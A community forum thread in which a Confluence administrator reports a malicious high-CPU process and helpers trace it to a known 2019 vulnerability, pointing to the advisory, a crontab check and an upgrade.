Forums
Home Product Q&A Discussion groups Articles Ask a question Search
Learning
Events
Champions

Forums

Articles
Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Product Q&A
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

zombie process of user "confluence" causes High CPU usage

VujacicSun
VujacicSun April 19, 2019

First of all, the server I run Confluence has no enough disk for the weekly backup job for the Confluence website and I can not access the Confluence website from my web browser.

Then, I run stop-confluence.sh which reports that kill the process failed. I run 'kill -9 XXXX' on the confluence process I can see in the 'top' command shows.

Then, I start the confluence server by running 'start-confluence.sh' as root. But I still cannot access the Confluence website and I found the zombie process of user "confluence" causes High CPU usage:

conf.jpg

and I CAN NOT kill the process any more, even I reboot the system.

I see in the atlassian-confluence.log as following:

2019-04-19 13:30:29,421 WARN [synchrony-interop-executor:thread-2] [plugins.synchrony.bootstrap.DefaultSynchronyProxyMonitor] pollHealthcheck Could not ping the synchrony-proxy [http://127.0.0.1:8090/synchrony-proxy/healthcheck]: {}
-- url: /longrunningtaskxml.action | referer: http://****:8090/admin/restore-local-file.action | traceId: 5eb0806c7e6e9c96 | userName: *** | action: longrunningtaskxml

 

The Confluence Version I used is 6.9.1-x64

Answer
Watch
Like Be the first to like this
1450 views

2 answers

2 accepted

0 votes
Answer accepted
Daniel Eads
Daniel Eads
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
April 22, 2019

Hey Vujacic, welcome to the Community.

As Bastian linked, it looks like your instance has been attacked due to a security vulnerability. I've written up some general first steps for detection (you've identified a malicious process) on this article. For your case, I would recommend looking at the crontab next (instructions in the article) to stop the process from re-launching itself.

We are happy to help on this question if you continue to have issues after going through the article. Please let us know!

Thanks,
Daniel | Atlassian Support

View More Comments
VujacicSun
VujacicSun April 23, 2019

Thanks for your help. 

I see the virus in '/var/spool/cron/confluence' and I have upgraded Confluence already.

Thx!

Like
Reply
0 votes
Answer accepted
Bastian Stehmann
Bastian Stehmann
Community Champion
April 20, 2019

Hi @VujacicSun ,

There is a vulnerability in confluence that is attached a lot this month and it seems that you have been hit by that.

Here is the advisory regarding this https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-10-968660855.html

View More Comments
VujacicSun
VujacicSun April 23, 2019

Thanks for your help. 

It's exactly the problem as you attached and I have upgraded Confluence from 6.9.1 to 6.12.4. It seems back to normal.

Thx!

Like
Reply

Suggest an answer

Log in or Sign up to answer
Confluence
Confluence
TAGS
AUG Leaders

Atlassian Community Events

    See all events
    Community
    Forums
    FAQs Forums guidelines
    Learning
    About learning Resources
    Events
    Champions
    Copyright © 2025 Atlassian
    Privacy Policy Terms Security
    Welcome illustration

    Welcome to the new Atlassian Community

    Online forums and learning are now in one easy-to-use experience.

    By continuing, you accept the updated Community Terms of Use and acknowledge the Privacy Policy. Your public name, photo, and achievements may be publicly visible and available in search engines.